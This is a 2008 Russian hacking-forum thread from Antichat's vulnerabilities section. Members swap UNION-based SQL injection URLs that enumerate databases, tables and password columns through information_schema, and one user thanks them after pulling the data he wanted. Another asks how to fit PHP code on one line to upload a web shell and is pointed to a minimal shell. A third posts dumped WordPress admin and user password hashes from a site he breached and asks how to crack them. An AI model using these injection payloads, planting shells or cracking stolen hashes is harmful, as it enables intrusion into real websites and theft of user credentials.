HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3871  
Старый 27.11.2008, 09:35
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

_Pantera_
Самое первое, что тебе нужно сделать - это посмотреть названия таблиц и названия БД в которых они лежат.
Цитата:
http://site.com/non.php?id=-6+union+select+1,2,concat(table_schema,char(58),ta ble_NAME),4,5,6,7,8+from+INFORMATION_SCHEMA.tables --
таким запросом ты узнаеш все бд )

а вот таким запросом ты посмотришь БД в которых лежит таблица..
Цитата:
http://site.com/non.php?id=-6+union+select+1,2,concat_ws(0x3a,table_schema),4, 5,6,7,8+from+information.tables+where+table_name= азвание таблы--
а вобще я бы сначало искал в каких таблицах и бд есть колонка например пасс)
Цитата:
http://site.com/non.php?id=-6+union+select+1,2,concat_ws(0x3a,table_schema,tab le_name),4,5,6,7,8+from+information.columns+where+ column_name+like+char(название поля)--

Последний раз редактировалось sabe; 27.11.2008 в 19:59..
 
Ответить с цитированием

  #3872  
Старый 27.11.2008, 09:50
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами: 10313606

Репутация: 1327
По умолчанию

Цитата:
Сообщение от sabe  
_Pantera_
Самое первое, что тебе нужно сделать - это посмотреть названия таблиц и названия БД в которых они лежат.
Код:
http://site.com/non.php?id=-6+union+select+1,2,concat(table_schema,char(58),ta ble_NAME),4,5,6,7,8+from+INFORMATION_SCHEMA.tables --
таким запросом ты узнаеш все бд )

Я вот непонимаю, зачем если ты не разбираешься в теме умничать?

table_schema - имя БД
table_NAME - имя таблицы


Цитата:
а вот таким запросом ты посмотришь названия таблиц и названия БД в которых они лежат..
Код:
http://site.com/non.php?id=-6+union+select+1,2,concat_ws(0x3a,table_schema),4, 5,6,7,8+from+information.tables+where+table_name=н азвание таблы--
А это что за бред???? Этим запросом ты посмотришь имя БД в которой лежит таблица "название таблы"


PS Мужики читайте литературу, я смотрю вы нахватались кусков из хеккерских форумов, а работать с БД не умеете.
 
Ответить с цитированием

  #3873  
Старый 27.11.2008, 10:34
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
С нами: 9216251

Репутация: 30
По умолчанию

Всем спасибо!
Все что нужно стянул.
sabe, a+
 
Ответить с цитированием

  #3874  
Старый 27.11.2008, 11:18
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами: 9361870

Репутация: 58
По умолчанию

2pantera прав хватает по любому) потому что этот файл index.php этого же сайта)
 
Ответить с цитированием

  #3875  
Старый 27.11.2008, 12:31
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
С нами: 9463474

Репутация: 155
По умолчанию

вопрос..как преобразовать пхп-код в одну строку?иными словами чтобы не было пробелов...всё в одной строке?
шелл короче залить..
 
Ответить с цитированием

  #3876  
Старый 27.11.2008, 12:43
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


По умолчанию

Попробуй перевести его в16битное шифрование.

Последний раз редактировалось -m0rgan-; 27.11.2008 в 12:47..
 
Ответить с цитированием

  #3877  
Старый 27.11.2008, 13:22
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию

Цитата:
Сообщение от _Pantera_  
Да ты ж синтаксиса sql команд не понимаешь!!! Доки читай по мускулу! хеккеры млин...
хех товарищ хакер обратите внимание на эти строчки в цитате:
Цитата:
ошибка: Table 'db.routines' doesn't exist ага, значит все в другой базе. далее смотрю в какой именно базе: отображается "information_schema"
во первых он сделал это без вас, во-вторых зачем ему весь список "баз(а/ы)-таблицы" если известно конкретное название таблицы?) пост sabe верный ток там оператор объединения непонятно зачем)
Octave_Parango значит либо нет записей либо есть пустые строки
masternet пхп шелл итак занимает 1 строчку всё остальное навороты
вот самый короткий) raz0r.name/releases/mega-reliz-samyj-korotkij-shell/
 
Ответить с цитированием

  #3878  
Старый 27.11.2008, 14:49
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами: 10313606

Репутация: 1327
По умолчанию

Цитата:
Сообщение от l1ght  
хех товарищ хакер обратите внимание на эти строчки в цитате:
Цитата:
ошибка: Table 'db.routines' doesn't exist ага, значит все в другой базе. далее смотрю в какой именно базе: отображается "information_schema"
во первых он сделал это без вас, во-вторых зачем ему весь список "баз(а/ы)-таблицы" если известно конкретное название таблицы?) пост sabe верный ток там оператор объединения непонятно зачем)
Ошибка говорит о том, что в БД под именем db таблицы "routines" не существует!
А дальше ты хоть сам понял, что написал?
Цитата:
далее смотрю в какой именно базе: отображается "information_schema"
Интересно, что тогда по твоему "information_schema", таблица чтоле?
information_schema - это название стандартной БД в мускуле 5!)
 
Ответить с цитированием

  #3879  
Старый 27.11.2008, 15:00
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами: 10198073

Репутация: 354
По умолчанию

Товарищи, прошу совета.

Добил необходимый мне ресурс. Там стоит походу вродпресс.
Вытащил значит следующие данные

(логин::пасс)
admin::$P$BaDgEI.EOMBqxOK7SWSWJfbPHfiVDT.
mary::$P$BQOOK8uZGPy9aPW/iZFQdVCYqfFEIe/
tom::$P$BMUL.P.H2ij4tFvv0RcZ.moF0RWId10


Это что вообще такое? o_O Это расшифровать реально (если это вообще хэши)?
Если да-то ткните как плз.
Я просто первый раз столкнулся, в недоумении...
 
Ответить с цитированием

  #3880  
Старый 27.11.2008, 15:02
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами: 9681386

Репутация: 2145


По умолчанию

похоже на юниксовый мд5, но там вроде на $1$ начинаться должно...
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.